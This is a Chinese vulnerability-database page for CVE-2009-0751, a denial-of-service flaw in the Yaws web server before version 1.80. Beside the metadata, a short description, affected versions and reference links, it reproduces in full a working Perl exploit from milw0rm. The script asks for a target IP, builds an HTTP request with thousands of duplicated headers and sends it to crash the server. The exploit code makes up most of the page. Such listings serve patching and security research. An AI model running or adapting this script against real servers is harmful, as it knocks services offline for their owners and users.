Yaws Multiple Header Request 拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117441 漏洞类型 资源管理错误
发布时间 2009-03-03 更新时间 2009-03-16
CVE编号 CVE-2009-0751 CNNVD-ID CNNVD-200903-050
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/8148
https://www.securityfocus.com/bid/33834
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-050
|漏洞详情
Yaws1.80版本之前的版本允许远程攻击者可以借助提交一个具有大量页眉的请求,以造成拒绝服务(内存破坏和崩溃)。
|漏洞EXP
#!usr/bin/perl -w

#######################################################################################
#   Yaws before 1.80 allows remote attackers to cause a denial of service (memory
#   consumption and crash) via a request with a large number of headers.
#   Refer:
#        http://yaws.hyber.org/
#        http://www.securityfocus.com/bid/33834/discuss
#        http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0751
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
#        Author:    Praveen Dar$hanam
#        Email:     praveen[underscore]recker[at]sify.com
#        Blog:       http://www.darshanams.blogspot.com/
#        Date:      03rd March, 2009
#        Site:       http://www.evilfingers.com/
#
###Thanx to str0ke, milw0rm, Manuel Duran Aguete, @rp m@n, and all the Security Folks###
########################################################################################

use IO::Socket;

print("\nEnter IP Address of Yaws Server(not domain): \n");
$vuln_host_ip = <STDIN>;
chomp($vuln_host_ip);
$port = 80;

$sock_http = IO::Socket::INET->new(  PeerAddr => $vuln_host_ip,
                                     PeerPort => $port,
                                     Proto    => 'tcp') || "Unable to create HTTP Socket";


$headers="Date: Tue, 03 Mar 2009 15:17:53 GMT\r\n".
"Accept-Ranges: bytes\r\n".
"Content-Language: en\r\n".
"Content-Type: text/html; charset=utf-8\r\n".
"Expires: Thu, 05 Mar 2009 15:17:53 GMT\r\n".
"Cache-Control: no-cache\r\n".
"Content-Encoding: gzip\r\n".
"Retry-After: 100\r\n";
print "\nHeaders are:\n$headers";

$i=0;
while($i<=13)    #this is just a PoC
{
$headers=$headers.$headers;
$i++;
}
print "\nHeaders are:\n$headers";
$yaws_attack = "GET / HTTP/1.1\r\n".
"Host: $vuln_host_ip:$port\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
$headers.
"Keep-Alive: 300\r\n".
"Connection: keep-alive\r\n".
"\r\n";
sleep(3);
print $sock_http $yaws_attack;
sleep(2);
print"\nRequest with large number of Headers sent...\n";

close($sock_http);

# milw0rm.com [2009-03-03]
|受影响的产品
Yaws Yaws 1.55 Yaws Yaws 1.54 Yaws Yaws 1.52 Yaws Yaws 1.51 Yaws Yaws 1.50 Yaws Yaws 1.79 Debian Linux 5.0 sparc Debian Linux 5.0 s/390
|参考资料

来源:yaws.hyber.org
链接:http://yaws.hyber.org/
来源:BID
名称:33834
链接:http://www.securityfocus.com/bid/33834
来源:MLIST
名称:[oss-security]20090219CVErequestforyaws
链接:http://www.openwall.com/lists/oss-security/2009/02/19/1
来源:MILW0RM
名称:8148
链接:http://www.milw0rm.com/exploits/8148
来源:DEBIAN
名称:DSA-1740
链接:http://www.debian.org/security/2009/dsa-1740
来源:SECUNIA
名称:34239
链接:http://secunia.com/advisories/34239
来源:SECUNIA
名称:33979
链接:http://secunia.com/advisories/33979